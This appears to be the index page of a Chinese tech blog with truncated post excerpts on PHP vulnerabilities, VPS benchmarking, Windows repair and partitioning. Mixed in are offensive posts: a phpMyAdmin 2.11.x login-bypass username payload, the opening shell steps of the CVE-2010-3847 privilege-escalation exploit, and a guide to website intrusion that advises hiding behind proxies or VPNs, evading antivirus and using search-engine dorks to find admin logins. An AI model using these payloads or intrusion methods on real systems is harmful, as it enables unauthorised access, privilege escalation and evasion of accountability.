php最新漏洞,CVE-2012-0830

漏洞编号:CVE-2012-0830
漏洞版本:PHP 5.3.9及其他版本
漏洞描述:PHP在12月为哈希碰撞拒绝服务(CVE-2011-4885)(http://sebug.net/vuldb/ssvid-30001)提供的补丁引出了另一个严重的安全漏洞。
漏洞详情:

防止哈希碰撞的补丁在php.ini中引入了新的配置属性:

max_input_vars

此配置元素限制用于请求中使用的变量数量(如http://request.com/foo.php?a=1&b=2&c=3),默认设置为1000。 漏洞修补在php_variables.c代码中的php_reg[……]

Read more

Linux VPS各项性能指标测试方法汇总

本文转自vps测评网,chenjie已经用nbvps,ucvps对所有命令做过测试,命令有效,分享给大家,自己也做个记录,呵呵。

现在各类VPS提供商可谓是多啊,那么当大家买到VPS时,是不是很有兴趣去测试下自己买的VPS性能呢?VPS评测与排名站就在本文中给大家总结下如何测试Linux VPS各项性能?

VPS的性能测试主要包括如下几个方面:

1.VPS访问速度测试

2.VPS CPU处理能力

3.VPS的硬盘读写性能

4.VPS网络性能测试

5.Linux VPS性能综合测试

一、VPS访问速度测试

这个主要是考虑网站的主要用户访问VP[……]

Read more

通过调用Hash冲突实现各种语言的拒绝服务攻击漏洞的远程利用

关于http://www.nigesb.com/hash-vul.html这个漏洞,很多人说这个只是坑爹的本地漏洞,没有用,于是弄了个邪恶的东西出来证明一下:


工具就不对外发布了,发布DOS工具是要坐牢的。。。。

通过调用Hash冲突实现各种语言的拒绝服务攻击漏洞

PHP在5.4发布的时候, 引入了一个新的配置项:

 max_input_vars

这个预防的攻击, 就是”通过调用Hash冲突实现各种语言的拒绝服务攻击漏洞”(multiple implementations denial-of-service via hash algorithm collision).

攻击的原理很简单, 目前很多语言, 使用hash来存储k-v数据, 包括常用的来自用户的POST数据, 攻击者可以通过构造请求头, 并伴随POST大量的特殊的”k”值(根据每个语言的Hash算法不同而定制), 使得语言底层保存POST数据的Hash表因为”冲突”(碰撞)而退化成链[……]

Read more

phpmyadmin使用@符号绕过登录漏洞

这个漏洞好像还蛮隐秘的,今天就说下吧

影响版本:

phpmyadmin 2.11.3

phpmyadmin 2.11.4

利用方式:

直接在phpmyadmin的用户名内填入:

‘localhost’@’@”

不用填入密码,可以直接登录,管理权限哦。

 

win7修复系统文件的方法

电脑硬盘神神经经的,在崩溃了一次之后,发现在我的电脑上右键,打不开管理了,提示“没有注册类”,叫我情何以堪,于是上网找答案,各种蛋疼方法无效。

自己估计是系统文件出问题了,于是用管理员权限运行命令行,输入:

sfc /scannow

一顿噼里啪啦之后,发现提示有文件损坏了,果然,但是无法修复,结果保存在%System%\\logs\\cbs\\cbs.log,打开一看,尼玛全是满满的日志呀,怎么看,没关系,继续在管理员权限的命令行中输入:

findstr /C:"[SR] Cannot repair member file" %windir%\\logs\\cb[......]

Read more

CVE-2010-3847 提权 CentOS5/RHEL5/Fedora13

# 在/tmp下创建可控制的目录

$ mkdir /tmp/exploit

# 链接到suid二进制程序以更改$ORIGIN的定义

$ ln /bin/ping /tmp/exploit/target

# 打开到目标二进制程序的文件描述符

$ exec 3< /tmp/exploit/target

# 现在可通过/proc访问描述符

$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# 删除之前所创建的目[……]

Read more

MiniTool Partition Wizard无损调整win7系统分区

公司电脑C盘装完64位的win7xp1,居然还剩4G,让我情何以堪,用很多人推荐的Acronis Disk Director Suite 来调整系统分区,毛都没调过来,反而导致系统启动时会跳出abnormal termination,蛋疼呀,赶快卸载,发现还是会再启动时跳错误,我了个擦,上网看下,解决方法如下:

注册表中 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager 下有个主键:BootExecute,它原来的值是:autocheck autochk * 但安装了Acronis Disk Direc[……]

Read more

win7使用2003中MMC的远程桌面管理工具

在win7中,默认是没有安装这个管理工具的,在XP上的拷贝文件那招不管用了,我们必须先下载一个对应win7的服务器管理工具

**Windows 7 SP1 远程服务器管理工具“仅”可以安装在运行企业版、专业版或旗舰版 Windows 7 或 Windows 7 SP1 的计算机上。**

通过 Windows 7 SP1 远程服务器管理工具,IT 管理员可以从运行 Windows 7 或 Windows 7 SP1 的远程计算机上管理安装在运行 Windows Server 2008 R2 SP1 或 Windows Server 2008 R2 的远程计算机上的角色和功能(以及运行[……]

Read more

网站入侵前的侦察和入侵后的善后工作

一:入侵前的侦察。
首先打开无界代理(最新版是U995)或VPN(推荐用飞易VPN,但不免杀的,可以简单做一下免杀)再做如下工作:
第一步:个人感觉,侦察时用来GOOGLE,用以下命令查后台和敏感信息:
site:www.****.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.*****.com inurl:login|admin|manage|manager|admin_login|login_admin|system
site:www.***.com intitle:管理|后台|登陆[……]

Read more